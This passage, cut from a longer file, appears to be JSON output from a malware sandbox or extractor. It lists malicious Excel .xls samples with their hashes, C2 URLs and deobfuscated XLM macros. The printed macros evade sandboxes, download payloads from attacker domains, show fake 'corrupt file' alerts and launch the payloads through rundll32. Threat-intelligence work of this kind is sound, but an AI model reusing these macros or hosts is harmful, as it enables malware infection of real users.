Macro","attr":{"formulas":"WORKBOOK.HIDE(\"XWX1FSRg7f\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"44d5ed138a1d838126f08f4bbc2a116511de6796da9fd8606556e71897a1696c"},"analysis":{"reported":"2020-04-09T16:16:04Z","score":10},"files":[{"filename":"44d5ed138a1d838126f08f4bbc2a116511de6796da9fd8606556e71897a1696c","filesize":113664,"md5":"0a3beed71261ddaf72540a48fdc24fa5","sha1":"7d0f0ce5366142041b72bea43f8e8b99b4b94a83","sha256":"44d5ed138a1d838126f08f4bbc2a116511de6796da9fd8606556e71897a1696c","sha512":"3446078b86c4184cdb96af860d34d333cff93da49dbc2c63510cad086e06faf1aec3e8eb61923a672cdd3e2ed1f9fa0888aace199f942e68b4abcd7d66444cdb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"44d5ed138a1d838126f08f4bbc2a116511de6796da9fd8606556e71897a1696c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"QnJR7730wZ\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"44e04577813ce67b52b4d3bd1667ad7699389d932ae3f319cc897304f0bb4e0f"},"analysis":{"reported":"2020-04-09T16:16:04Z","score":10},"files":[{"filename":"44e04577813ce67b52b4d3bd1667ad7699389d932ae3f319cc897304f0bb4e0f","filesize":185344,"md5":"aaa23b3cfc2ecd3a2461fc7535af6fbd","sha1":"7c80420a64b7e9278267305a24c9ce03a7243aee","sha256":"44e04577813ce67b52b4d3bd1667ad7699389d932ae3f319cc897304f0bb4e0f","sha512":"676bc8eaf15ac5b78b4b34abc8ce55b17ca7c4b0fa8c3a49d5f214e1751598d4fbf2d54299b9f32eba7b95aee5ffcaeb762a7c05d0f64bedcf8cf5933a9a2dcf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"44e04577813ce67b52b4d3bd1667ad7699389d932ae3f319cc897304f0bb4e0f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"44e444fa117c502b123341d656070331a51e1b77f9248763a4a162412c0ced03"},"analysis":{"reported":"2020-04-09T16:16:04Z","score":10},"files":[{"filename":"44e444fa117c502b123341d656070331a51e1b77f9248763a4a162412c0ced03","filesize":209920,"md5":"22eb728bdbc96c9f35499be9ff19b562","sha1":"ae4920e114b018191595c0eb11a9ff9e772e2048","sha256":"44e444fa117c502b123341d656070331a51e1b77f9248763a4a162412c0ced03","sha512":"ac0614fefcdc6855957d60cb680994f359a5ac7392c9bfb63e44a9fcb3384c8d8e878e00444c43b3f5065661720614203eac4fce17bb4cb1ecabdc913dcae8cc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"44e444fa117c502b123341d656070331a51e1b77f9248763a4a162412c0ced03.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dqXhlGHoio\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"44ecc5a7dcd1540f869f22d7c96d85de112ec156d36b397b573648a0c41d7d0e"},"analysis":{"reported":"2020-04-09T16:16:04Z","score":10},"files":[{"filename":"44ecc5a7dcd1540f869f22d7c96d85de112ec156d36b397b573648a0c41d7d0e","filesize":160768,"md5":"007adeae3830949bff0791df14c0d363","sha1":"5ccb72080f5fca58d78f471830a74fb19c67e096","sha256":"44ecc5a7dcd1540f869f22d7c96d85de112ec156d36b397b573648a0c41d7d0e","sha512":"676788e09f41c37cf2a63c99e8987b6edad31cd2bd8bc501795a1a4feff056265c22db163cd770026ae005af984a9caf059e594a3f5b18c06cdeffa8a1136408","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"44ecc5a7dcd1540f869f22d7c96d85de112ec156d36b397b573648a0c41d7d0e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"aZ2TZD9rWe\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"44f5dad6a44f99155fbb5d0ee72078ba1bc95222c833c3bd089f2b5fd07817bc"},"analysis":{"reported":"2020-04-09T16:16:04Z","score":10},"files":[{"filename":"44f5dad6a44f99155fbb5d0ee72078ba1bc95222c833c3bd089f2b5fd07817bc","filesize":185344,"md5":"a6908db227b054e32be593ecc0e43f8f","sha1":"17f8763dabfbc2072b8f221b04dea71d7a0e04eb","sha256":"44f5dad6a44f99155fbb5d0ee72078ba1bc95222c833c3bd089f2b5fd07817bc","sha512":"c645b27dfd28d7296e49288161ad1ad1f6e5a2cace85a82ae6d945df6d575eeea0f2cd28f33d63a2213ca97d2439522dd6753b321bdc38140ddabf13929688fe","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"44f5dad6a44f99155fbb5d0ee72078ba1bc95222c833c3bd089f2b5fd07817bc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"44fb20c34d918ecad4e0f6b3af50c48369779e06f25d5911974c246fcceb2ac6"},"analysis":{"reported":"2020-04-09T16:16:04Z","score":10},"files":[{"filename":"44fb20c34d918ecad4e0f6b3af50c48369779e06f25d5911974c246fcceb2ac6","filesize":160768,"md5":"d804d9fe96857b5188963c3575096021","sha1":"7ac99fe70935f983e28294513daaf3969646101e","sha256":"44fb20c34d918ecad4e0f6b3af50c48369779e06f25d5911974c246fcceb2ac6","sha512":"2db7b3df3a0d665b9ce8518e9b3ca178741c632e300a61cca8b5a1dc7e354187868d0cec7255e39f274e97b7d21f40f3f9068c5661bcddc34b1edbd6fc538c49","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"44fb20c34d918ecad4e0f6b3af50c48369779e06f25d5911974c246fcceb2ac6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7X6VjTNLJ7\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"44fe247472b5d9c40c1cbf0c202478f20bda532e782ddf37dabbbf0d8bf23a9a"},"analysis":{"reported":"2020-04-09T16:16:04Z","score":10},"files":[{"filename":"44fe247472b5d9c40c1cbf0c202478f20bda532e782ddf37dabbbf0d8bf23a9a","filesize":214528,"md5":"7f0cf2318876f6e57f5ff4711553c879","sha1":"830202f917e29a57444532408c1dda8d8c3e79c1","sha256":"44fe247472b5d9c40c1cbf0c202478f20bda532e782ddf37dabbbf0d8bf23a9a","sha512":"e7ca3457ebed826baf7f152741efd888bda5a172b5e7a6803ad4a460146c251c3ffe9ecac2f4799ec4eec97c5e500bbdec14a6d1cc33532688d25933d7b50b37","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"44fe247472b5d9c40c1cbf0c202478f20bda532e782ddf37dabbbf0d8bf23a9a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"uqd6Bf81tk\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"450ea73433b65e97a4510049906b88c3d389216522c0aee89cbc6bb447c3a37e"},"analysis":{"reported":"2020-04-09T16:16:04Z","score":10},"files":[{"filename":"450ea73433b65e97a4510049906b88c3d389216522c0aee89cbc6bb447c3a37e","filesize":185344,"md5":"f3918d82dee0247b78eb12a87d7420d0","sha1":"aa47781699c27d7776bb96c48de22486f3c5c172","sha256":"450ea73433b65e97a4510049906b88c3d389216522c0aee89cbc6bb447c3a37e","sha512":"e46e5685a21c5083f948f3fcdac171b8f6761d4716f6b5e6378e2ca32ab9da9641d363a6a4b4ab84e36cee88ea27a5932e2e23df1733ce9dc62a5a97e0e62d6d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"450ea73433b65e97a4510049906b88c3d389216522c0aee89cbc6bb447c3a37e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"45154777295942ab7bd03e42ad12215ae4503b523e84dccaf1ec32dc2d7fbff6"},"analysis":{"reported":"2020-04-09T16:16:04Z","score":10},"files":[{"filename":"45154777295942ab7bd03e42ad12215ae4503b523e84dccaf1ec32dc2d7fbff6","filesize":167936,"md5":"141606dcde80d5d12eabe3f7c6eea729","sha1":"dbf74ebe45bcd70fe7d94116311688e8ca128b09","sha256":"45154777295942ab7bd03e42ad12215ae4503b523e84dccaf1ec32dc2d7fbff6","sha512":"8a29e0284d797a161b3e6873aca06f9b95cacd148bd3be07ad72ab93d383b2ddb8647f013258b878956bd6813e0fa778e6ae5f7e24377a85c048b7d149f55dc6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"45154777295942ab7bd03e42ad12215ae4503b523e84dccaf1ec32dc2d7fbff6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"DYB29cVyGh\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"451d10dcaeeb3db526d1db3ef1319e126aa1b567d2c5882bba2fce4238a0513f"},"analysis":{"reported":"2020-04-09T16:16:04Z","score":10},"files":[{"filename":"451d10dcaeeb3db526d1db3ef1319e126aa1b567d2c5882bba2fce4238a0513f","filesize":214528,"md5":"13c6c8b9b41395e28e4172710b3e1c6a","sha1":"0e2a2d236c72b843fae180579041b76b36d0e59a","sha256":"451d10dcaeeb3db526d1db3ef1319e126aa1b567d2c5882bba2fce4238a0513f","sha512":"dce435f7842260fd44f1b627279b0ca8eb7d3125326a63e67490c7e89b901658f0e49e0c03ecfe43295fc125349ca0ae387c74e67fcdf75b6db5f7671da1cfd3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"451d10dcaeeb3db526d1db3ef1319e126aa1b567d2c5882bba2fce4238a0513f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dNHjQ3ckQz\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"45206a21d3fcf22c67021f774100ca155a1939e3cf9244bd35994d3870e031fb"},"analysis":{"reported":"2020-04-09T16:16:04Z","score":10},"files":[{"filename":"45206a21d3fcf22c67021f774100ca155a1939e3cf9244bd35994d3870e031fb","filesize":577536,"md5":"c34472472fa69b124837427ca5456bef","sha1":"bc0467d389b87cc5ca9540830d957ab7ac69b334","sha256":"45206a21d3fcf22c67021f774100ca155a1939e3cf9244bd35994d3870e031fb","sha512":"05eb1d47931f704e62a5954d229cd9669c09d06ab8af11b5949e897f2eebcb7b9b92932b29fccdffd4e08d1c23569b36f1aada5ab9bd120050932e4c5edde65d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"45206a21d3fcf22c67021f774100ca155a1939e3cf9244bd35994d3870e031fb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(R$7C$4,R$7C$4,R$7C$4,R$7C$4,R$7C$4)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4525ee4a87dc024a2eaf269d447a669d42ee5ee4bf5abf6a5f5f5681e91d2001"},"analysis":{"reported":"2020-04-09T16:16:04Z","score":10},"files":[{"filename":"4525ee4a87dc024a2eaf269d447a669d42ee5ee4bf5abf6a5f5f5681e91d2001","filesize":168448,"md5":"7b6866420374206bd71119c8a4aa7712","sha1":"61375e82b93623c9d83234f4e7ec5e9e0f8a3721","sha256":"4525ee4a87dc024a2eaf269d447a669d42ee5ee4bf5abf6a5f5f5681e91d2001","sha512":"ebc71cda050a693d8f0b0cb190af0a6179603f5071ab97d598b942a15c72a3ecd41e8cc63208e5ec4e32bdc58a22fd784ff84aea8db66c7ac162c127e9cec0d4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4525ee4a87dc024a2eaf269d447a669d42ee5ee4bf5abf6a5f5f5681e91d2001.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8Ru511qbl8\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4535027e4633a98778c579aac6a57a7c7783e42b76cbe010c8fc3d75a38ddc3c"},"analysis":{"reported":"2020-04-09T16:16:04Z","score":10},"files":[{"filename":"4535027e4633a98778c579aac6a57a7c7783e42b76cbe010c8fc3d75a38ddc3c","filesize":167936,"md5":"d6cb43a5129797b921458ff660ea4ff1","sha1":"f8939caeaca3049b515a925629093b0114b4e4be","sha256":"4535027e4633a98778c579aac6a57a7c7783e42b76cbe010c8fc3d75a38ddc3c","sha512":"522fba2926b7bb286ab695fd66fc2014f89fa1c436516e2f17d316013c028303c14002f8451d05028e203cb58438eee938cb20b010c2e07bc1004d29c534afb8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4535027e4633a98778c579aac6a57a7c7783e42b76cbe010c8fc3d75a38ddc3c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bQXX4sBf3A\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"45669cc1e2fa95e0bfbee03c79a41aae5cf3a2f32ca82ffe3c5f224c3c46320d"},"analysis":{"reported":"2020-04-09T16:16:05Z","score":10},"files":[{"filename":"45669cc1e2fa95e0bfbee03c79a41aae5cf3a2f32ca82ffe3c5f224c3c46320d","filesize":67584,"md5":"a6f3eaaf78b97c36200365933161f3a5","sha1":"265ca058c998e1b70f1c618820f2f7f71b7c2b6b","sha256":"45669cc1e2fa95e0bfbee03c79a41aae5cf3a2f32ca82ffe3c5f224c3c46320d","sha512":"e8c36077d5fdf51564b6c453c08f0a28586206c20fe2cef31fc9a51560eccc0e3ff2c7d6de1cd6f0389ed7f8a8d7853eb0bee57b03350098f8ecd54543f4dcc4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"45669cc1e2fa95e0bfbee03c79a41aae5cf3a2f32ca82ffe3c5f224c3c46320d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(R$31C$11,1350,\" \")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"456d39f8b7c8465ebb7e22391aaa1bc78399600d5ce92a06a5bc5c11304bd63a"},"analysis":{"reported":"2020-04-09T16:16:05Z","score":10},"files":[{"filename":"456d39f8b7c8465ebb7e22391aaa1bc78399600d5ce92a06a5bc5c11304bd63a","filesize":168960,"md5":"e316fe05703d0252eeb3d7f7567763c4","sha1":"426b33401e0ecd27b7dbde381bfcac3def766f92","sha256":"456d39f8b7c8465ebb7e22391aaa1bc78399600d5ce92a06a5bc5c11304bd63a","sha512":"a902a01d84f2963cb7ffbccd89a0863d933f63e97d364ecd73a3f8128c413720a8f9b634fcc4f14b4c9d1e37450c2e06622bc9af68cd5fcd0572e33e069ed4ed","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"456d39f8b7c8465ebb7e22391aaa1bc78399600d5ce92a06a5bc5c11304bd63a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"DaMrJfbNG0\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"458deffaee759ae5f4aa792617bf70f605ffc1414006adf39d1c2aa5169364eb"},"analysis":{"reported":"2020-04-09T16:16:05Z","score":10},"files":[{"filename":"458deffaee759ae5f4aa792617bf70f605ffc1414006adf39d1c2aa5169364eb","filesize":167936,"md5":"1095e0c09dc121a87f1261e633db2fff","sha1":"71ef6db43883ff5bd28398343dacca2bf99c31ad","sha256":"458deffaee759ae5f4aa792617bf70f605ffc1414006adf39d1c2aa5169364eb","sha512":"b4b98714fa4f02f53cb22b32f247c79cfd6cbf10216670278f2952755fd6d640be5fff80ed2db655d97395aa806cdf298723174fff3a57d96b19275f18e874e4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"458deffaee759ae5f4aa792617bf70f605ffc1414006adf39d1c2aa5169364eb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config"